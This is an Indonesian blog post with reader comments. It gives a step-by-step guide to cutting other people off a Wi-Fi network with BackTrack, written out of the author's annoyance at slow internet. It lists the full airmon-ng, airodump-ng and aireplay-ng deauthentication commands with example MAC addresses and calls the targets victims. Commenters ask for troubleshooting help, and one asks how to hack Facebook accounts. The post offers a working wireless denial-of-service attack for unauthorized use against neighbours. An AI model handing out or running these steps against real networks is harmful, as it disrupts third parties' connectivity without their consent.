Rabu, 24 Juli 2013

Memutuskan Jaringan Wifi Orang Lain dengan Backtrack

Saya kesal jika sementara asik online, tiba-tiba lambat. Untung saya pengguna backtrack.
 
Perhatikan langkah saya dalam memutuskan jaringan wifi orang lain menggunakan Backtrack

1. Buka terminal lalu ketikkan ifconfig untuk memeriksa interface anda
    wlan0 adalah nama default pada Backtrack.
    
2. Aktifkan mode monitor dengan perintah :
     airmon-ng start wlan0
 
3. Mode monitor aktif. Untuk scanning korban, masukkan perintah :

     airodump-ng mon0
    ctrl+C untuk menghentikan scanning. Tentukan target (Ex:70:f1:a1:b2:72:77)
    

4.Langkah memutuskan jaringan korban, masukkan perintah berikut

     aireplay-ng -0 jumlahpaket -a BSSID -c Macadresskorban mon0

    Jumlah paket : lamanya pemutusan jaringan tergantung banyaknya pket
    untuk BSSID
    Contoh : (aireplay-ng -0 500 -a 11:22:33:44:55:66 -c 70:f1:a1:b2:72:77 mon0)

     
Proses berhasil jika tampak seperti dibawah ini

30 komentar:

  1. Saya pakai Virtualbox dan hasilnya berbeda kak, padahal koneksinya pake Wi-fi... kira-kira bisa ga?

    BalasHapus
    Balasan
    1. Saya jg prnah pake Virtualbox, hasilnya mmuaskan.
      Yg bermasalah wktu smpai step ke brp?

      Hapus
  2. BackTarck itu gimana

    BalasHapus
    Balasan
    1. Backtrack adalah perbanyakan Ubuntu-Linux

      Hapus
  3. kk maksutnya jumlah paket untuk BSSI apa y

    BalasHapus
    Balasan
    1. Setelah memasukan perintah airodump-ng mon0 , akan muncul data-data yang akan diperlukan, termasuk BSSI.
      Kalau jumlah paket, itu terserah anda mau memasukan berapa.

      Hapus
  4. gan maksudnya angka kaya [ 3| 4 ACKs] itu apa ya?

    BalasHapus
  5. maaf bari pemula...mode monitor yg mana???

    BalasHapus
    Balasan
    1. Masukan perintah "airmon-ng start wlan0" (tanpa tanda petik) di terminal Linux untuk mengaktifkan mode monitor

      Hapus
  6. mau tanyak mas . saya pakek debian di virtual box kok ndak bisa ya ? hehe maaf pemula .
    yang wlan0 itu ndak ada adanya wired connection 1 karena saya nyambung di wired connection 1

    BalasHapus
  7. kalo pake Linux Mint 13 Mate Bisa nga....?????

    BalasHapus
  8. Balasan
    1. Link download apa gan?
      Backtrack ?

      http://www.backtrack-linux.org/downloads/

      Hapus
  9. (Tanya) cepetan mana mutuskan koneksi wifi dengan aireplay ato mdk3 gan?

    BalasHapus
  10. kenapa gak pake tuxcut aja gan ? lebih simpel, gk perlu ngetik apa2, tinggal pilih target aja :)

    BalasHapus
  11. gimana cara bobol account fb pakai bt ?

    BalasHapus
  12. gan kalo pake windows 8 bisa ga

    BalasHapus
  13. sory gan nanya nie ane pke bt5r3 di virtual kok ga detek wifi bawaan laptop ane y bisa bantu ga gan ?

    BalasHapus
  14. gan, cara setting network di Virtualboxnya gimana.?

    BalasHapus
  15. Saya Tidak ada wlan0 nya gan , gmna tuh

    BalasHapus
  16. saya pake backtrack 5 r3 di virtual tapi wifinya gx kedetek itu kenapa ?

    BalasHapus
  17. kira-kira jaringan saya ikut terputus nggak law makai perintah diatas ???

    BalasHapus
    Balasan
    1. tidaklah...dalam keadaan (wifi anda off ) sj...anda bisa memutuskan jaringan wifi yg terdeteksi di laptop anda...pelajari jg cara maen hospot gratis dengan menggunakan backtrack (nebeng hosppot)

      Hapus
  18. min.kalu yang mau diputusin itu semua yang terhubung dengan wifi kita.caranya

    BalasHapus